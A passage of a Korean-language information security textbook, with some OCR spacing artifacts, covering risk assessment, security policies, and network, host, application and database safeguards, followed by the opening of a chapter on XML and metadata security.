리용할 필요가 있다. 평가를 실현하기 위한 초기 경영진의 결심채택과 예산은 여전히 요 
구된다. 기업전반적인 위험평가는 매우 많은 노력을 요구할수 있다. 평가에 기대와 목적 
을 두는것이 매우 중요하다. 이것은 특히 그 어떤 다른 평가도 진행된적이 없다면 매우 
어 려 울수 있 다. 

평 가는 회 사전반과 그 처 리환경 을 포괄하는 공식 적 인 회 사전반적 평 가로부터 선택 된 
환경에 대한 보다 작은 목적의 평가에 이르기까지 여러 형태가 있다. 실례로 침투시험이 
나 취 약점탐색 은 비 합법 적 인 입 구점 의 로출을 찾아 내 기 위한 회 사의 외 부접 근에 대 하여 
실행될수 있다. 다른 하나의 실례로는 조작체계들의 상태와 그것들이 보안보강프로그람 
들을 놓치 지 않았는지 또는 부정 확하게 설정 되 였는지 하는것 들을 결정 하기 위하여 진행 
하는 호스트조작체계의 분석을 들수 있다. 

공식 적 인 회 사위 험 평 가는 거 의 틀림 없 이 보안과정 의 수립 이 계 속되 기전에 제 일차로 
요구될수 있다. 회사는 무엇이 필요하고 보안기틀에서 불완전한곳은 어디이며 우선시해 
야 할것은 무엇이고 방책에서 빠진것은 무엇이며 경영진에게 반드시 알려 주어야 할것은 
무엇인가 하는것들을 어떻게 확인할수 있는가. 보안기틀의 매 요소와 그에 내포된 위험 
들이 다른 요소들에 영향을 미치며 매 위험은 완성된 기틀을 유지하는데 영향을 미치리 
라는것 은 사실 이 다. 그러 나 많은 회 사들은 시 간이 나 돈，대 책 들을 심 중히 고려하여 기 업 
전반의 위 험평 가를 진행하여 야 한다. 특별한 목적 을 가진 보다 작은 평 가가 준수되면 첫 
째로 보안공정이 한층 강화될수 있다. 

보다 작은 공식평 가는 응용프로그람개 발이 나 봉사기，망과 갈은 기 본보안구성 요소 
들의 결 함을 찾아 내 는데 쓸수 있 다. 이 단순한 평 가는 응당한 주의 를 돌려 수행하여 
야 할 기 초적 인 최선의 실천문제 들을 확인하는데 도움을 줄수 있다. 이것은 보다 복잡 
한 공식적 또는 회사전반적인 평가를 먼저 요구하지 않고 시작할수 있도록 계획을 세 



워 나갈수 있게 한다. 이런 경우 보다 공식적인 회사전반위험평가는 후날에 우선시될 
수 있다. 


법과 질서: 방책，절차, 표준，지침 


모든 세 계는 일정한 형 태의 법과 질서를 요구한다. 회 사보안방책 (8) 은 이 새 로운 세 
계에 대한 골간과 방향이나 방도를 제공한다. 그것은 회사가 어디에 있으며 어디로 가려 
고 하는가를 정 의한다. 이 보안방책 은 업 무공정 에 서 고수하여 야 할 기 준을 수립한다. 그 
기 준은 기 관전반에 걸 쳐 론리 에 맞고 일 관한 수준을 달성 하기 위하여 자료처 리 환경 의 매 
구성 요소(하드웨 어, 쏘프트웨 어)들에 대 하여 규정된 보안통제수단이 다. 지 침은 일반기준 
BS 7799( 영국표준 7799) 와 같은데서 나 BS 7799이 후의 국제적 인 표준모형을 채용하기 위 
한 시도들 (ISO 17799) 에서 문서화된다. 

방책과 절차는 기술이 발전하는데 따라 또는 업무요구가 변하는데 따라 끊임 없이 변 
한다. 방책의 수준은 여러가지이다. 높은 수준의 방책은 상당히 포괄적이여야 하며 다음 
과 갈은 항목들을 담고 있어 야 한다.《모든 콤퓨터체계들은 비루스검사도구들을 최신비 
루스부호들로 유지갱 신하여 야 한다.》이것은 경 영 진의 지도서 이다. 보다 낮은 수준의 방 
책 들은 회 사가 표준화한 특정비 루스검 사쏘 프트웨 어 를 문서 화한 보다 기 술적 인 문서 나 표 
준화안이다. 절 차는 방책 을 지 원하는 단계 적 인 활동이 며 비 루스부호들을 유지 갱 신하거 나 
표준비루스도구들을 사용하는 방법에 대한 규정들을 확인할것 이다. 이 낮은 수준의 방책 
들은 경영진과 회사에서 일관하게 집행되여야 할 결심채택을 안받침하면서 유지갱신하고 
발전시켜 나가야 한다. 높은 수준의 방책은 보다 적게 변하지만 그래도 정기적으로 관찰 
되여야 하며 경영의 업무모뎀에 적용할수 있는가를 알기 위하여 지어 시험까지 해보아야 
한다. 방책도 프로그람과 꼭같이 앞으로의 참조，경 영 진의 조사，실행인증(마지막 서 명) 
등을 위한 낡은 판번과 함께 판번조종을 하여 야 한다. 이 런것 들은 기 초적 인 경 영변경 의 
필수적인 구성요소들이다. 

울타리보안 

어 러 석寒 자는 콤퓨터 를 무시 하지 만 현명한 사람은 그것 을 자기 의 가장 맹 렬 한 도전대 
상으로 여 긴다. 

이 확고한 보안세계의 겉면은 매 가동환경에 맞는 기본 보안해결계층들로 덮여 있다 
(이 장에서 이야기하는 가동환경은 자료에로의 접근을 제공하는 어떤 처리환경을 의미한 
다). 이 계 층들은 어 느것 을 택 하는가에 따라 OSI 참조모형 의 7개 계 층 즉 물리층，자료련결 
층，망층，전송층，대화층，표현층，응용프로그람층들의 매 계층에 해 당하는 보안계층이나 
혹은 취약성계층이 될수 있다. OIS 모형은 각이한 콤퓨터들을 인터페이스로 련결시킬수 
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있게 하는 규약계층들의 모임이다. 보안은 물리적이거나 기술적이거나 론리적인 그리고 
관리적인 구성요소들과 밀접히 련관된다. 조작체계와 개개의 자료기지 그리고 각이한 망 
구성방식들의 차이나는 특징은 모두 자료처리를 위한 가동환경들을 제공한다. 그것들의 
구조는 특수하고 매 가동환경마다 서로 다른 약점 이 있으며 최대 한의 보호를 위 하여 특 
별 한 설계 와 설정 또는 제 3자기술을 요구할수도 있 다. 

울타리유지보수 (14) 는 가장 도외시될수 있는 보안취약성의 하나이다. 울타리의 유지 
보수는 쏘프트웨어 나 하드웨 어 가 최 신으로 갱 신되 지 않거 나 알려 진 보안보강프로그람들 
이 적용되지 않기때문에 자체로 그리고 저절로 진행되지 않는다. 일반적으로 공격자들은 
자기들의 도구로 가동환경에 있는 알려 진 취약점들을 람색한다. 취약성조사쏘프트웨어 
에 의하여 취 약점 이 발견되 면 그것 들을 수정 하고 이 로출점 들을 제 거 하기 위한 보수를 
진행 한다. 

그림 28 _1에서 (12) 로 표시한 경 영 진에 대 한 보고서제 출에 따라 경 영 진은 제 기된 
의견을 접수하고 사건에 대한 정보를 유지보수하는데 필요한 예산요구로부터 제기되는 
보안의 필요성을 분석한다. 이 단계의 보고서제 출은 경 영 진의 결심채 택을 안받침한다. 만 
일 경영진이 예산에서 약속된 돈이 어데로 나가는가에 대하여 전혀 귀를 기울이지 않는 
다면 필요할 때 추가예산지출을 더 줄일것이다. 이것은 전체 주기를 반복시킨다. 하드웨 
어，최 신쏘프트웨어 제 품판，보안보강프로그람，자료기 지 또는 증강된 경 로기 와 다른 망기 
술들은 갱신될수 있다. 


실속 없는 사람: 탁상형콤퓨터 


탁상형 콤퓨터 는 여 덟번째 취 약성 에 가장 가까우며 어 떤 망에 서 도 흔히 가장 취 약한 
점 즉《 사람》으로 고찰된다. 놀랍게도 그것은 흔히 개선된 보안에 대한 맨 마지막 취 
약점 으로 간주된다. 탁상형를퓨터는 가장 많고 대체 로 조종할수 없는 입구점 을 의 미하므 
로 그렇게 되기가 일쑤이다. 지난 몇해동안 더욱더 많은 보안기술과 제3자판매업체들의 
해결책들은 탁상형콤퓨터에 접근하는 방향에서 나오게 되였다. 보안의식 (15) 은 사람의 취 
약성에 주의를 돌리는 보안공정의 기초적인 해결책이다. 

인증，권한부여，구좌처리를 임의의 보안기술의 주요구성요소로서 간주하라. 권한부 
여 는 탁상형 콤퓨터 를 사용하는 사람들에 대 한 적 당한 인증에 의 거한다. 접 근조종체 계 들 
례 컨대 생체측정，스마트카드，통표 지 어 PKI 갈은것들은 모두 의뢰기 실행 에 의존하며 
흔히 탁상형를퓨터 에 접근하는 의뢰기 대화에 의존한다. 실례 로 다른 조종이 없는 PKI 는 
사용자의 인증을 제공하지 않지만 워 크스테 이 션이 나 무릎형콤퓨터 를 인증하거 나 열쇠 가 
권한 있는 사람의 손에 있는가 하는데 무관계하게 그 열쇠 를 어 떤 위 치 에 든 보관한다. 
실제 의 인증루린들은 봉사기 에서 실 행 될수 있지 만 필요한 통합을 실현하기 위하여 탁상 
형콤퓨터응용프로그람이나 조작체계와 련결하는데 흔히 의뢰기코드가 요구된다. 앞에서 
도 언급하였지만 흔히 탁상형를퓨터가 너무 많기때문에 실현비용이 높으며 완전판과 성 
공적 인 실현때 문에 말단사용자로부터의 통합을 요구한다. 
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력사적으로 볼 때 많은 회사들에서 말단사용자가 보안을 개선하는데 도움을 주는 어 
떤 행동을 할것을 기대한다는것은 바람직할만한 일이 못되였다. 이것은 말단사용자들이 
더 많은 를퓨터상식을 알게 되고 기술이 보다 친절해 지면서 점차 호전되여 가고 있다. 
이것은 또한 견실한 보안의식화과정 (15) 을 통하여 그들에게 방책，표준，절차들을 계속 
알려 줄뿐아니 라 기 술과 가동환경 의 알맞는 리용에 대 한 부단한 교육을 줌으로써 개 선되 
여 나갈수 있다. 

간선도로와 측선도로: 망 


도로는 사회들간의 련계를 지어 주는 수단이다. 망은 도로와 많은 측면에서 아주 류 
사하다. 자료처리세계에서 망은 사용자와 자료사이의 통신(련계)을 제공한다. 자료가 보 
관된 위치나 사용자의 물리적위치에 관계없이 망은 사용자의 접근을 보장할수 있다. 

북부지방의 나라들에는 두개의 계절 즉 겨울철과 도로건설계절만이 있다고들 한다. 
도로와 같이 망은 빈번한 감시와 정상상태를 보존하며 원활하고 안전하게 동작하도록 하 
기 위한 유지 보수를 필요로 한다. 훌륭하게 건설된 도로가 안전한 수송을 보장하듯이 알 
맞게 구축되고 설정된 망은 안전하고 비밀이 담보된 자료의 전송을 보장한다. 그러나 원 
활하게 동작하는 망이 반드시 비밀 이 보장된 망이라는것을 의미 하지는 않는다. 일반적으 
로 망의 기능은 한곳에서 다른곳으로 비트렬의 전송을 보장하는것이다. 

IDS(Intrasion Detect System), VPN(Virtual Private Network), 일 반적 인 망암호화와 같은 
기술들 (13) 은 모두 망의 보안을 강화시킨다. IDS 는 해당 직원에게 우발적인 사건에 대하 
여 경 고하고 의 심 스러 운 활동을 보고함으로써 망의 보안에 기 여한다. VPN 은 공공망 즉 
인 터네 트를 리용하여 망들을 서 로 안전하게 련결 하도록 한다. 간단히 말하여 3DES 나 
IPSec 와 갈은 암호화규약을 리용하는《가상런넬》이 비밀전송을 보장하면서 망들사이에 
설 치된다는것 이 다. 만일 이것 이 정 확히 설정되면 파케트가로채 기와 통과암호절취 를 막을 
수 있다. 본질상 VPN 은 비 밀을 담보할수 없는 인터네 트규약상의 두 점 사이 에 암호화를 
리용하는 믿음직한 런넬을 제 공한다. 암호화통로를 통하여 자료는 보관고로부터 사용자 
에게 전송되는 선로상에서 위 장된다. 

도시，구역 및 마들: 봉사기와 호스트 


오늘 호스트나 봉사기들의 형태나 조작환경은 다양하다. 지난 시기에는 MVS, VM, 
DEC-VAX 등의 메인프레 임 지향체 계 들이 있 었다. 메인프레 임 은 봉사기 와 탁상형 콤퓨터 의 
모든 기 능을 다 가질 수 있 었 을뿐아니 라 오늘날 여 러 봉사기 들에 보급된 지 어 각이한 조 
작체 계 상에 서 운영 되 는 그러한 봉사까지 각이한《 가동환경》들에 제 공할수 있 었다. 오 
늘날의 메인프레 임 (지 금은 기 업 용봉사기 로 더 잘 통한다)들과 일 부 보다 강력한 봉사기 
들은 가동환경에 따라 가상적 인 분산을 제공하지만 그것은 모두 같은 물리적 인《함》에 
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존재한다. 가동환경 마다 자료기 지 봉사기， Web 봉사기，응용프로그람봉사기 지 어 보안봉사 
기 와 같은 그러한 전문봉사를 제공한다. 이 개 개의 봉사기는 다른 조작체 계를 가진 물리 
적 으로 다른 하드웨 어 에 존재할수 있다. 이것은 명백 히 보안조종을 위한것 이 아니 라 성 
능조종을 위 한것 이 다. 

호스트나 봉사기 들은 기 본적 으로 다음과 갈은 4개 의 취 약성계 층을 가지 고 있 다. 

1. 하드웨 어(물리적함 실례 로 특별한 설정 을 할수 있는 내부구성 요소들，메 모리， 
CPU ) 

2. 기 본입 출구 ( FO : input / output ) 나 펌 웨 어. 이 것은 CPU 에 처 리 자료를 제 공하거 나 정 
보를 보관고나 인쇄장치 로 보낸 다. 

3. 조작체계의 커널 또는 핵. 이것은 도시중심부의 아주 중요한 부분에 비유할수 있 
는데 바로 이 부분이 도시의 나머지 부분을 움직 인다. 

4. 조작체 계 인터네 트 혹은 쉴. 실례 로 사용자들에 게 자기 의 친절성 을 보장하는 지 령 
렬 인터페 이 스나 그라픽 스사용자인터페 이 스를 들수 있다. 

물리 적장치 나 조작체 계 는 도시 에 서 건물과 비 교할수 있 다. 다양한 건물들은 구색 에 
맞게 봉사할수 있도록 자기의 구조를 가지고 있다. 은행은 금고실의 돈을 보호할수 있도 
록 특별히 견고하게 건설 하지 만 식 당은 밖에 서 차에 탄 고객 들도 쉽 게 식 사를 요청할수 
있도륵 차에 탄채 로 들여 다 볼수 있는 특별한 창문과 확성 기체계를 구비한다. 특별한 
조작체 계 를 가진 봉사기 들은 방화벽 에 의한 보호를 보장 받을수 있도록 견고하게 구축되 
는가 하면 공공자료를 지 원하고 사용자들의 쉬 운 접 근이 나 일 반자료의 리용을 보장할수 
있도륵 열린구조로 구축될수 있 다. 

이러한 계층들을 서로 무난히 결합하여 적합한 콤퓨터보안가동환경을 구축하는것은 
째 해볼만한 일 이 다. 보안체 계는 물리적 인 절도나 부정적행 위 로부터 내부구성요소들을 
보호할수 있도록 고려되여야 한다. 경보장치들, 물리적인 관건장치들 또는 적합한 환경 
및 접근조종장치들로 조종되는 콤퓨터실은 하드웨어를 보호할수 있도록 한다. 여러 제3 
자판매 업체 에서 제 공하는 접근조종체계들을 구입하여 커널의 기 본보안을 강화하거 나 지 
령의 실행권한과 메뉴선택권한이 있는 사람들의 조종명부를 리용하여 주변장치들에 대한 
접근조종을 할수 있다. 


도시, 구역 및 마들의 운영: 응용프로그람 


응용프로그람은 조작체계와 자료기지에 크게 의존하며 이러한 계층들을 가지고 원활 
하고 안전한 처리환경을 보장할수 있도록 설계된다. 조작체계 ( OS ) 와 통합하거나 자료기 
지 ( DB ) 에 밀접히 통합되는 응용프로그람은 적응성이 가장 좋으며 OS 나 DB 의 고유한 특 
징에 영향을 줄수 있다. 이것은 자기자체의 인증과 검사에 의존하는 응용프로그람을 대 
신할것 이 다. 통합된 응용프로그람은 부차적 인 인증계 층이 나 업무처 리의 복잡성 이 없기때 
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문에 사용자가 모두 리용할수 있는것이다. 

만일 응용프로그람이 자기자체의 인증에 의존한다면 그것은 필경 추가적인 약점을 
로출시키며 말단사용자를 위한 또 하나의 루린도 끌어 들일것이다. 어떤것은 보안을 위 
하여 또 하나의 통과암호와 추가적 인 인증을 더 요구하지만 사용자는 어디까지나 취약한 
통과암호를 선택하여 써넣기때문에 계속 더 다른 통과암호를 고안해 내도록 하는 사람의 
속성은 쓸데 없는 시간랑비만을 추구할뿐이다. 조작체계가 이미 인증을 보장하지만 왜 
그것을 믿지 않고 다시 인증하는것을 피하지 않는가. 

응용프로그람이 보장하는 특별한 업무기능은 그 응용프로그람에 내장된 특별한 기능 
을 가진 응용프로그람준위의 보안을 요구한다. 이 기능들은 어느 사용자가 어떤 특수기 
능을 수행할수 있는가 하는것을 조종할수 있어야 한다. 사용자를 확인하기 위하여 특수 
한 인증을 응용프로그람자체에 제공하기보다는 오히려 그 응용프로그람이 사용자가 이미 
조작체 계 준위 에 서 인증되 였 다는것 을 믿 도륵 하는편 이 낫다. 응용프로그람은 사용자가 수 
행할수 있는 기능들을 조종할수 있도록 자체의 인증구조를 가질수 있지만 그 인증을 진 
행하기 위하여 조작체계나 자료기지와 인터페이스로 련결되여야 한다. 이를 위한 한가지 
방법이 응용프로그람이나 조작체계의 API(Application Programming Interface ) 들을 제공하 
는것 이 다. 이 API 들은 응용프로그람과 조작체 계사이 의 통합 또는 스마트카드，토큰， 공개 
암호열쇠，생체측정 등의 제3자판매업체기술들과의 통합과 같은 주문화기능을 제공한다. 

도서관과 학교: 자료기지 


자료기지는 자료 또는 처리된 자료(정보)의 그릇이다. 그것은 대부분의 회사들이 보 
호하려고 하는 실체 즉 자료에 가장 가까운 대상이다. 자료기지는 보안정보，응용프로그 
람조종，메타자료 또는 자료에 대한 자료 그리고 단순히 기초자료자체 등을 담고 있을수 
있 다. 

자료기지도 응용프로그람과 같이 사용자가 누구인가를 확인하기 위한 인증에 의거 함 
으로써 사용자들이 접근할수 있는 대상과 적당한 련관을 맺도록 해준다. 인증은 그 다음 
에 자료요소들(테블, 렬，마당，행 )에 로의 사용자의 접 근을 확인하는데 접 근준위 (갱 신，삽 
입，삭제)는 물론 자료기 지편의 프로그람에 로의 접 근형 태 (반입，반출，싣 기，부리 우기，압 
축)도 함께 확인한다. 응용프로그람보안이 철저히 실현된다 하여도 해당한 사용자들만 
그 응용프로그람기능에 접근할수 있게 자료기지 에서의 인증과 권한조종을 진행하지 않으 
면 자료에 직 접 접근하도록 자료기지봉사가 제공된다. 이것은 감시 자들에게 자주 발견되 
는《뒤문》이나 취약점을 산생시킨다. 이 봉사들은 응용프로그람보안을 《우회》하며 
그 응용프로그람에 내장되여 있을만한 어떠한 편집기능이나 조종기능을 가지지 않는다. 
이 때문에 자료를 질의 하고 수정하려 는 사람들은 그 응용프로그람을 리용하지 않으려 하 
며 다른 도구들을 써서 보다 직 접적 으로 그 자료에 접근할것 이 다. 대부분의 관계형자료 
기 지 관리 체 계 ( RDBMS ) 들은 자료를 직 접 관리 하기 위 하여 SQL 이 나 기 타 직 접 접 근보고도 
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구와 같은 언어들을 사용할수 있도륵 한다. 실례로 Peoplesoft 7.0 응용프로그람체계는 인 
증과 권한부여 등을 포함하여 견고한 보안기능들을 내 장하고 있지만 PeopleSoft 구성 방식 
이 의존하고 있는 RDBMS 구좌들이 알맞게 설정되여 있지 않고 이 자료기지구좌들이 정 
확히 관리 되지 않는다면 모든 PeopleSoft 자료에 로의 접 근은 자료기지 를 통하여 직접 와해 
될수 있다. 취약하게 설계된 Web 응용프로그람을 또 다른 하나의 실례로 들수 있다. 응용 
프로그람은 자기 의 임의 의 사용자의 모든 접 근에 대 하여 단일 한 포괄적 인 자료기지구좌 
를 요구한다. 그 구좌는 자료기지 에 접속하기 위하여 응용프로그람에 반영 하기 힘든 고 
정된 통과암호를 설정할것을 요구한다. 하나의 구좌에 뚫고 들어 가면 전체 프로그람이 
와해된다. 

이 약점 을 처 리 하기 위한 한가지 방도는 조작체 계 의 기 능내 에 서 쉴 들 (UNIX) 의 리용 
을 제 한하여 하나의 구좌가 조작체 계준위 에 서 수행할수 있는 기 능을 조종하는것 이 다. 실 
례 로 UNIX 환경 의 DB2UDB 자료기 지 는 본 조작체 계 에 의 거하여 인증(통과암호검 사)을 진 
행 하고 사용자구좌가 속한 그를을 관리한다. 구좌는 실제 로 조작체 계 에 접 속하지 못한다. 
구좌기 정값 썰 에 빈 멜을 할당하여 그 구좌가 그 준위 에서 실제 로 아무런 기 능도 수행하 
지 못하도록 할수 있다. 이렇게 하면 어떤 UNIX 멜도 열리지 않고 조작체계와의 임의의 
쎄 션을 종결시키지 만 통과암호검 사는 여전히 발생 되 고 자료기지 에 로의 접속도 여 전히 동 
작한다. 

다른 하나의 인기 있는 RDBMS 인 기 초 ORACLE 은 아주 취 약한 고전적 보안기 능 
을 가진 다. Braintree System(Pentasafe)SQLSECURE 와 같은 제 3 자기술은 자료기 지보안 
인증，권한부여，구좌감시특성 들을 강화시 킬수 있다. 이 도구들은 자료기 지 나 조작체 
계 에 대 한 접 근조종체 계 들, 탁상형 콤퓨터 나 봉사기 용항비 루스도구들, 암호화(공개열 쇠 
기 반)나 가상개 별 망 (VPN) 들, 침 해 방지 체 계 (IDS) 들에 대 하여 호스트기 반이 든 망기 반이 
든 관계없이 모두 기초환경에 대한 보안수준을 강화하고 기본가동환경이 자기의 취약 
점 을 개 선할수 있게 하는 보안기 술들 (13) 이 다. 그러 나 잘못 유지갱 신되 는 (14) 기 술들은 
늘어 나는 복잡성뿐아니 라 유치하게 유지 되 는 조작환경 과 갈은 새 로운 취 약점 들을 초 
래 한다. 


보안주기: 요약 

다른 사람들의 실수로부터 배우라 . 남들이 범한 실수를 자신이 직접 체험하려면 일생을 
살아도 모자랄것이다 . 

과거는 우리에게 무엇을 가르쳤는가. 사람은 과거의 실수들에서 배울 필요가 있다. 
하드웨 어 나 쏘프트웨 어 에 대 한 유지 보수나 갱 신을 하지 않으면 과거 의 실수를 되 풀이하 
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게 하는 비합법적인 접근과 갈은 취약점들을 그대로 가지고 있게 된다. 알려 진 취약점 
들은 비합법적인 접근의 근본원인으로 되며 처리환경의 안정성을 위협한다. 

많은 회사들은 자료처 리 에서 메 인플레 임 방식 으로부터 분산형체 계 방식 으로 이동하였 
지만 보안조종은 그에 따라 서지 못하였다. 새 로운 환경은 메 인프레 임 방식 에서 그러 하였 
던것처럼 조종감시에 응당한 주의를 돌릴것을 요구한다. 낡은 환경에서 완전무결하였던 
방법론들을 새 로운 처 리환경들을 구축하는데 리용함으로써 옳바른 환경구축에 드는 시 간 
을 절약하라. 

여덟개 계층의 취 약성 이 있다. 이 계층들은 물리적계층，기술적계층，관리자계층들로 
득 맞아 떨어 진다. 세부취 약점들은 OSI 참조모형의 물리층，자료련결층，망층，전송층，대 
화층，응용프로그람층들과 운영자이든 사용자이든 누구나 가장 큰 실수를 로출시킬수 있 
는 가장 곤난한 취 약성조종계층으로 구분된다. 

확고한 보안세계를 구축하는 사업은 업무처 리모형을 구성하는 모든 계층들에 주의를 
돌릴것을 요구한다. 매 층마다 고유한 취약점들을 드러 낸다. 완성된 해결대책은 기술문 
제에만 귀착되는것이 아니다. 관리，경영，처리는 모든 보안해결대책의 중요부분들이다. 
보안공정전반에 대한 리해는 포괄적인 보안계획작성을 도모한다. 전반계획은 경영진의 결 
심채택과 충분한 예산 그리고 경영자를 교육하고 서로 의견을 나누며 경영자 혹은 경영 
진에 조사결과를 제출하여 모든것들을 서로 결합시키는 보안의식화과정이 있는 방책이라 
는 지침을 가짐으로써 보안흐름의 주기를 유지하도록 한다. 
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제 2 9 장. XML 과 기타 메타자료언어에 대한 보안 


월 리 암 하흐 말레 이 


필자는 어린 나이에 착공카드장치조작공으로 일하였다. 이 기계는 원시적인 정보처 
리기였으며 여기서 정보는 종이에 뚫린 구멍형식으로 기억되였다. 이전의 관점에서 보면 
종이는 상대적으로 보잘것 없지만 현대적관점에서 보면 대단히 가치 있는 자료의 보관고 
이다. 례를 들어 1 Gbyte 의 기억은 착공종이로 환산하면 보통 크기의 방을 공간 없이 꽉 
채 울 정도였다. 종이는 자료의 보관고로서 가치 가 있었지만 기록량에 있어서는 엄연한 
한계 가 있었다.《 단위기록》은 홀러리스코드 (Hollerith code : 80 X 12 착공카드에 자료를 표 
현 하기 위한 코드-역 주)로 쓸 때 80개 문자로 한정 된 다. 이 코드는 평 균 초당 10-15 개 
문자를 읽 을수 있 다. 병 렬 로는 분당 8-12 K 를 읽는다. 

그러므로 응용프로그람설계자들은 흔히 고밀도부호화를 쓴다. 례컨대 날자로서의 년 
도는 흔히 한개 수자로 또는 응용프로그람에 따라 두개 수자로 기억되였다. 이것이 유명 
한 2000년문제의 시원이였다. 2000년문제가 해결되였으므로 이 문제를 흔히 프로그람작 
성의 론리적문제 로 생각하였다. 즉 프로그람은 기 억된 년도를 4개의 수자로 처 리하지 않 
으므로 2000을 1999의 다음이 아니 라 이전으로 해 석한다. 이것은 또한 자료의 질문제와 
관련되기도 하였다. 년도를 1개 또는 2개의 수자로 코드화할 때 흔히 정보는 완전히 상 
실되 였다. 문제를 확정 하자면 자료가 무엇 인가 하는것을 추측해 야 하였다. 

착공카드기록에서 문자의 의미는 그것이 놓인 위치에 의하여 결정된다. 례컨대 구좌 
번 호는 카드의 1렬 부터 8렬 사이 에 기 록되 여 야 한다. 안정한 대 규모응용프로그람의 착공 
카드장치조작공들은 흔히 카드에 구멍 뚫린것을 보고 그 응용프로그람의 기록을 알수 있 
으며 마당을 구획지어 갈라 볼수 있게 된 카드표면을 보고 어 떤 정 보가 어 느 렬 에 기 억 
되 여 있 는가 하는것 을 결 정한다. 

파일의 이름은 흔히 카드에 구멍을 뚫어 부호화하였으며 마당의 이름은 카드에 있는 
그 위치로 부호화하였다. 부호표는 코드앞면에서 인쇄되든가 또는 따로 기억되였다. 어느 
경 우이건 조작공은 그것을 리해할수 있었지만 기 계는 그렇지 못하였다. 즉 자료에 대 한 
자료는 기계가 리해할수 없었으므로 기계에 리용될수 없었다. 

정보의미의 이러한 의미부호화와 종이에 갈라서 부호화하는 분산기록은 일찌기 콤퓨 
터 프로그람작성 에 도입 되 여 리용되 였 다. 그러 므로 2000년문제 해 결에 착수함에 있어 서 어 
디서 문제성들이 나타날수 있겠는가를 알아 내는데서 기계에 의거할수 없었고 프로그람 
과 자료밖의 원천을 참고하지 않으면 안되였다. 

메 타 자 료 

현대 식 으로 말하면 자료에 대 한 자료를 메 타자료라고 한다. 메 타자료를 리용하여 다 
른 방법으로는 서로 알수 없는 프로그람들사이의 자료통신을 보장한다. 자료기지스키마， 
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스타일쉬트 (style sheet ), 태그언어 그리고 지어 COBOL 의 자료정의 부분도 다 메타자료의 
실례들이다. 지금은 기억이 빠르고 렴가이므로 현대실천에서는 자료가 서술되는 자료를 
가진 메 타자료의 보관을 요구한다. 많은 응용프로그람과 규약에서 메 타자료는 자료와 함 
께 전송된다. 전자자료교환 ( EDI ) 이 좋은 실례로 된다. 여기서 마당들은 자료들의 의미와 
그 용도를 태 그로 전송한다. 

고급한 사용자들은 메타자료형식으로 자료를 기억시키며 움직 인다. 중요한 보안실천 
에 의하면 메 타자료는 자료기 지 에서처 럼 자료에 철저 히 결합되 여 예 견하지 않은 변화를 
방지해야 하며 그 어떤 변화도 명백히 하여야 한다. 객체지향콤퓨터환경에서는 자료와 
그 의 미 그리 고 그 자료에 따라 수행할수 있는 모든 연산들이 단일 객 체 로 묶어 질 수 있 
다. 이 객체 는 임의의 변화와 오해 를 다 방지한다. 

태그언어 

태그언어는 메타자료의 한 형식이다. 태그는 특별히 형성된 마당으로서 자료에 대 
한 정보를 담고 있다. 태그는 위치로 나타낸 자료와 결합된다. 즉 태그는 자료에 선행 
한다. 태그는 임의로 그러나 종종 그 뒤와 해당한 끝태그의 앞에 있는 모든것에 관계 
된 다. 

XML 은 태그언어이다. 이런 의미에서 HTML , EDL , GML 과 비슷하다. 태그는 그와 
내용적으로 련관된 자료에 대한 정보를 담고 있는 변수이다. 태그는 메타자료이다. 제 
한된 정도에서 태그들은 단어를 보존한다. 제한된 보존만이 요구되는것은 다른 태그언 
어 에 서 와 같이 태 그가 그 어 떤 약속에 의하여 다른 자료와 구별되 기 때 문이 다. 례 컨대 
태 그들은 그 왼쪽과 오른쪽에 거 듭 인용부호들을 주어 <태 그이 름>과 같이 표시하든가 
또는 :태 그이 름과 같이 두점 으로 시 작하여 태 그이 름을 쓰는 방법 으로 표시한다. 이 런 
식으로 태그들을 구별할수 있다. 매개 태그는 우의 경우와 비슷하게 서로 구별되면서 
도 그와 련관된 끝태그를 가지고 있다. 례컨대 왼쪽에 거듭인용부호를 주고 빗선을 준 
다음에 태그이름을 주는 식으로 즉 </태그이름>과 같이 또는 처음에는 두 점을，그 다 
음에는 문자 《 e 》 를 주고 그 오른쪽옆에 태그이름을 주는 식으로 즉 : e 태그이름과 같 
이 끝태그를 시작함으로써 끝태그들을 구별할수 있다. 끝태그들을 리용하는것은 자료 
의 길이속성을 필요로 하지 않도륵 하기 위한것이다. 태그들은 겹쳐서 사용된다. 례컨 
대 이 름과 주소에 대 한 여 러개의 태 그들이 이름과 주소에 대 한 한개의 태 그안에 나타 
날수 있다. 

태그언어는 태그정의들의 모임이다. 모임，언어，언어변종 또는 스키마와 같은것은 
문서형정의객체 에서 정의된다. 이 스키마는 그것 이 서술하는 객체안에서 교갑화되거 나 
또는 참조，문맥 혹은 기정 값에 의하여 그 객체 와 련관될수 있다. 이 언어정의들은 겹 쳐 
서 쓰일수 있으며 흔히 겹쳐서 쓰인다. 이것은 최대한의 기능과 유연성을 보장하지만 혼 
동을 일으킬수 있다. 

《 표식달기》의 개 념은 편집 과 출판으로부터 나온것 이 다. 필자는 문서를 편집 자에게 
넘 겨 준다. 편집 자는 필 자와 인쇄 공 또는 식 자공과 련계 를 위하여 본문에 《 표식달기》 
를 한다. 초기의 태 그언어 는 일 반표식언어 ( GML ) 였다. 이 언어 가 아마 표식달기언어 의 원 
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형 인것 갈다. 그러 나 표식 달기 의 개 념은 개 개 의 단계 에 서 수행 되는것을 제 시 하여 원본에 
값 또는 정보를 보충하게 한다. 표식달기언어라고 부르는 많은 태그언어들은 사실상 그 
특별한 의미에서는 표식달기언어가 아니다. 

대부분의 언어와 같이 태그언어들도 특수용도에 쓰인다. 태그언어에서는 특정한 문 
맥에서만 뜻을 가질수 있는 특수한 어휘들만이 쓰인다. 

례컨대 재정봉사에서 단어 《보안》의 의미는 정보기술에서와는 다른 의미로 쓰인다. 
이 와 마찬가지 로 EDI 에 서 는 오직 자기 들의 응용프로그람에 서만 쓰일 수 있는 X12, 
EDFACT, TRADACOMS 를 비 롯한 많은 각이 한 어 휘 들이 쓰인다. 

확장표식언어 ( XML ) 

XML 은 자료요소들을 서술하는 언어이다. XML 은 자료의 속성들을 서술하고 있으 
며 자료의 의미와 그 용도를 식별한다. XML 은 매개 자료들과 련관된 태그들의 모임 
과 그 태 그들을 해 신하는 서 술문들로 이 루어 져 있 다. 자료기 지스키 마와 기 록의 설계 
를 생각해 보라. 이러한 언어들의 제한성들에 대해서도 생각해 보라. 그리고 XML 을 
HTML 과 비교하여 생각해 보라. HTML 이 자기 문서들의 연시 및 인쇄 방법을 제시 한 
다면 XML 은 이런것들을 자기의 속성으로 가지며 바로 이것이 XML 의 의미이다. 
XML 은 마술사가 아니다. 

